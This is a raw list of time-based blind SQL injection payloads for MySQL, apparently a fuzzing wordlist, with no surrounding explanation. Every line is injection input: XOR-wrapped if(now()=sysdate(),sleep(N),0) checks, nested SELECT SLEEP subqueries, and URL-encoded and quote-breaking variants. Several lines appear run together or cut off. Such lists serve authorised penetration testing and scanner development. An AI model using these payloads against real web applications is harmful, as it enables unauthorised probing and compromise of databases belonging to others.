'XOR(if (now()=sysdate(), sleep(10),0))XOR'Z
" XOR(if (now()=sysdate(), sleep(10),0))XOR "Z
X'XOR(if (now()=sysdate(//sleep(10)//,0))XOR 'X
X'XOR(if (now()=sysdate(), (sleep (10)),0))XOR'X
'XOR(SELECT (0) FROM (SELECT (SLEEP (10))) a)XOR'Z
'XOR(if (now()=sysdate(), sleep (10),0))OR'
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"/
(SELECT(0) FROM (SELECT(SLEEP(8)))a)
'%2b(select*from(select(sleep(5)))a)%2b'
(select*from(select(sleep(5)))a)
'XOR(SELECT CASE WHEN(1234-1234) THEN SLEEP (9) ELSE @ END)XOR'Z
1'%2b(select*from(select(sleep(5)))a)%2b'
,(select * from (select(sleep(5)))a)
desc%2c(select*from(select(sleep(5)))a) 
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))(SELECT * FROM (SELECT(SLEEP (5)))YYYY)(SELECT * FROM (SELECT(SLEEP(5))) 
YYYY)#(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--'+(select*from(select(sleep(5)))a)+'(select(0)from(select(sleep(5)))v)%
if(now()=sysdate(),sleep(3),0)/'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"/
27XOR(if (now()=sysdate(), sleep (9),0))XOR%27Z
if(now()=sysdate(), sleep(10),0)/'XOR(if(now()=sysdate(), sleep(10),0)) OR "XOR(if (now()=sysdate(), sleep(10),0) and 1=1)"/
v)+'"+(select(0)from(select(sleep(5)))v)+"*%2f(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))
2f'+(select(0) from (select(sleep(5)))v)+'"(select(0) from(select(sleep(5)))v)%2f*'+(select(0) from (select(sleep(5)))